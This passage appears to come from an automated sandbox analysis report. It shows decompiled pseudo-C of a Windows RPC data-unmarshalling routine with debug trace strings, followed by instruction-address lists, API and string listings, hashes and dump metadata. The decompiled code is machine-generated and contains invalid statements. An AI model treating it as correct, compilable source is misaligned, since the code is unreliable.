										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp - 4) & 0x0000ffff;
									__edx =  *(__ebp + 0xc);
									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__imp__RpcRaiseException();
									}
									L8:
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L14:
									 *(__ebp - 0x1c) = 0;
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									_push("pointer => %p\n");
									0x6eda0000();
									__esp = __esp + 8;
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__edx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(__ecx != 0x11) {
										 *(__ebp + 8) =  *(__ebp + 8) + 4;
										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
									}
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									 *(__ebp - 0x20) =  *(__eax + 4);
									__edx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__ecx =  *(__ebp + 0x14);
										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
										}
									} else {
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
										__eax =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x1c) = 1;
									}
									__ecx =  *(__ebp + 0x18) & 0x000000ff;
									__edx =  *(__ebp + 0x14);
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__ebp - 0x20);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
									if( *(__ebp - 0x1c) == 0) {
										L28:
										__edx =  *(__ebp + 0x10);
										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
											__edx =  *(__ebp + 0x10);
											__edx =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										} else {
											__ecx =  *(__ebp + 0x14);
											__ecx =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) = __ecx;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L47:
											 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L23:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6eda0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												__ecx =  *(__edx + 4);
												__ecx =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6eda0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x20);
										 *( *(__ebp + 8) + 4) = __ecx;
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
										goto L28;
									}
								case 8:
									L32:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L33:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L34:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									L35:
									__ecx =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
									 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
									__ecx =  *(__ebp + 0x10);
									__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xc:
									L36:
									1 = 1 << 0;
									__eax =  *(__ebp + 0x10);
									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__eax =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__edx =  *(__ebp - 8);
									__eax =  *(__ebp + 8);
									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp - 0x18);
									_push( *(__ebp - 0x18));
									_push("embedded complex (size=%d) => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0x18) & 0x000000ff;
									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
										__ecx =  *(__ebp - 0x18);
										__edx =  *(__ebp + 0xc);
										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
									}
									__eax =  *(__ebp - 8);
									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
									__ecx =  *( *(__ebp - 8)) & 0x7f;
									__edx =  *(0x6edbb418 + __ecx * 4);
									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no unmarshaller for embedded type %02x\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__eax =  *(__ebp - 8);
										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									L45:
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0xe:
									goto L0;
								case 0xf:
									L10:
									__ecx = __ebp - 0x28;
									__edx =  *(__ebp + 8);
									E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
									__ecx =  *(__ebp - 0x28);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push(__ecx);
									_push("uint3264=%ld => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 0x10:
									goto L46;
							}
						}
						return  *(_t220 + 0xc);
					}
				}
			}






                                                                                                0x6eda96a8
                                                                                                0x6eda96a8
                                                                                                0x6eda96a8
                                                                                                0x6eda96b2
                                                                                                0x6eda96c0
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96df
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda956c
                                                                                                0x6eda9581
                                                                                                0x6eda958a
                                                                                                0x6eda9594
                                                                                                0x6eda9ab7
                                                                                                0x6eda9ac3
                                                                                                0x6eda9ac8
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda9acb
                                                                                                0x6eda959a
                                                                                                0x6eda959d
                                                                                                0x6eda95a4
                                                                                                0x00000000
                                                                                                0x6eda95ab
                                                                                                0x6eda95b5
                                                                                                0x6eda95c0
                                                                                                0x6eda95c7
                                                                                                0x6eda95c8
                                                                                                0x6eda95cd
                                                                                                0x6eda95d2
                                                                                                0x6eda95db
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95e3
                                                                                                0x6eda95e5
                                                                                                0x6eda95ed
                                                                                                0x6eda95f5
                                                                                                0x6eda95f8
                                                                                                0x6eda95f9
                                                                                                0x6eda95fc
                                                                                                0x6eda95ff
                                                                                                0x6eda9600
                                                                                                0x6eda9605
                                                                                                0x6eda960a
                                                                                                0x6eda960d
                                                                                                0x6eda9610
                                                                                                0x6eda9613
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9671
                                                                                                0x6eda9673
                                                                                                0x6eda967b
                                                                                                0x6eda9683
                                                                                                0x6eda9686
                                                                                                0x6eda9687
                                                                                                0x6eda968a
                                                                                                0x6eda968c
                                                                                                0x6eda968d
                                                                                                0x6eda9692
                                                                                                0x6eda9697
                                                                                                0x6eda969a
                                                                                                0x6eda969d
                                                                                                0x6eda96a0
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9726
                                                                                                0x6eda9728
                                                                                                0x6eda972c
                                                                                                0x6eda9730
                                                                                                0x6eda9738
                                                                                                0x6eda973b
                                                                                                0x6eda973c
                                                                                                0x6eda973f
                                                                                                0x6eda9743
                                                                                                0x6eda9746
                                                                                                0x6eda974b
                                                                                                0x6eda9750
                                                                                                0x6eda9755
                                                                                                0x6eda9758
                                                                                                0x6eda975b
                                                                                                0x6eda975e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9766
                                                                                                0x6eda9768
                                                                                                0x6eda9770
                                                                                                0x6eda9778
                                                                                                0x6eda977b
                                                                                                0x6eda977c
                                                                                                0x6eda977f
                                                                                                0x6eda9782
                                                                                                0x6eda9783
                                                                                                0x6eda9785
                                                                                                0x6eda9786
                                                                                                0x6eda978b
                                                                                                0x6eda978e
                                                                                                0x6eda978f
                                                                                                0x6eda9794
                                                                                                0x6eda9799
                                                                                                0x6eda979f
                                                                                                0x6eda97a2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97aa
                                                                                                0x6eda97ac
                                                                                                0x6eda97b0
                                                                                                0x6eda97b4
                                                                                                0x6eda97bc
                                                                                                0x6eda97bf
                                                                                                0x6eda97c0
                                                                                                0x6eda97c3
                                                                                                0x6eda97c6
                                                                                                0x6eda97ca
                                                                                                0x6eda97cf
                                                                                                0x6eda97d4
                                                                                                0x6eda97d9
                                                                                                0x6eda97dc
                                                                                                0x6eda97df
                                                                                                0x6eda97e2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda961b
                                                                                                0x6eda961d
                                                                                                0x6eda9625
                                                                                                0x6eda962d
                                                                                                0x6eda9631
                                                                                                0x6eda9634
                                                                                                0x6eda9636
                                                                                                0x6eda9639
                                                                                                0x6eda963a
                                                                                                0x6eda963d
                                                                                                0x6eda963f
                                                                                                0x6eda9640
                                                                                                0x6eda9645
                                                                                                0x6eda964a
                                                                                                0x6eda964d
                                                                                                0x6eda9656
                                                                                                0x6eda9658
                                                                                                0x6eda965d
                                                                                                0x6eda965d
                                                                                                0x6eda9663
                                                                                                0x6eda9663
                                                                                                0x6eda9666
                                                                                                0x6eda9669
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97ea
                                                                                                0x6eda97ea
                                                                                                0x6eda97f1
                                                                                                0x6eda97f4
                                                                                                0x6eda97f5
                                                                                                0x6eda97fa
                                                                                                0x6eda97ff
                                                                                                0x6eda9802
                                                                                                0x6eda9805
                                                                                                0x6eda980b
                                                                                                0x6eda980d
                                                                                                0x6eda9810
                                                                                                0x6eda9810
                                                                                                0x6eda9813
                                                                                                0x6eda9816
                                                                                                0x6eda981c
                                                                                                0x6eda9823
                                                                                                0x6eda9827
                                                                                                0x6eda982c
                                                                                                0x6eda982f
                                                                                                0x6eda9832
                                                                                                0x6eda9835
                                                                                                0x6eda9838
                                                                                                0x6eda983f
                                                                                                0x6eda9860
                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994b
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f0
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda96e7
                                                                                                0x6eda96e9
                                                                                                0x6eda96ed
                                                                                                0x6eda96f9
                                                                                                0x6eda96fc
                                                                                                0x6eda96ff
                                                                                                0x6eda9701
                                                                                                0x6eda9704
                                                                                                0x6eda9705
                                                                                                0x6eda9708
                                                                                                0x6eda970a
                                                                                                0x6eda970b
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971b
                                                                                                0x6eda971e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf
                                                                                                0x6eda9acb

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAAFA0: RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001,?,?,?,?,?,?,6EDA3C70,?,00000000), ref: 6EDAAFE9
                                                                                                  • Part of subcall function 6EDAAFA0: _memmove.LIBCMT ref: 6EDAB016
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA965D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$int3264=%ld => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                                • API String ID: 2890701851-428653425
                                                                                                • Opcode ID: 4c1e46c716b09a463f737b4cd28b163a3e8d02ef3333489d52d607862503c3b1
                                                                                                • Instruction ID: 538ff7b30f40be6edc45a9e7ec288dca6edf6461cf1c5260239bcf7da9e491b7
                                                                                                • Opcode Fuzzy Hash: 4c1e46c716b09a463f737b4cd28b163a3e8d02ef3333489d52d607862503c3b1
                                                                                                • Instruction Fuzzy Hash: 0CD129B5A00108AFCB04CF99E890EEA77B9AF89314F04C519FA195F345E731EA51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA99A7, Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 313COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 24%
                                                                                                			E6EDA99A7() {
				void* _t219;
				void* _t221;
				void* _t222;

				L0:
				while(1) {
					L0:
					E6EDB0770( *(_t219 + 0xc), 0, ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c);
					_t222 = _t221 + 0xc;
					 *(_t219 + 0xc) =  *(_t219 + 0xc) + ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c;
					while(1) {
						L47:
						 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
						L1:
						while(( *( *(_t219 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t219 - 0xc) =  *( *(_t219 + 0x10)) & 0x000000ff;
							 *(_t219 - 0xc) =  *(_t219 - 0xc) - 1;
							if( *(_t219 - 0xc) > 0xb8) {
								L46:
								0x6eda0000("unhandled format %d\n",  *( *(_t219 + 0x10)) & 0x000000ff);
								_t222 = _t222 + 8;
								while(1) {
									L47:
									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t15 =  *(_t219 - 0xc) + 0x6eda9b24; // 0xcccccc0f
							switch( *((intOrPtr*)(( *_t15 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
								case 0:
									L4:
									E6EDAAFA0( *((intOrPtr*)(_t219 + 8)),  *(_t219 + 0xc), 1);
									_push( *(_t219 + 0xc));
									_push( *( *(_t219 + 0xc)) & 0x0000ffff);
									_push("byte=%d => %p\n");
									0x6eda0000();
									_t222 = _t222 + 0x18;
									 *(_t219 + 0xc) =  &(( *(_t219 + 0xc))[0]);
									L47:
									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L12:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [eax]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
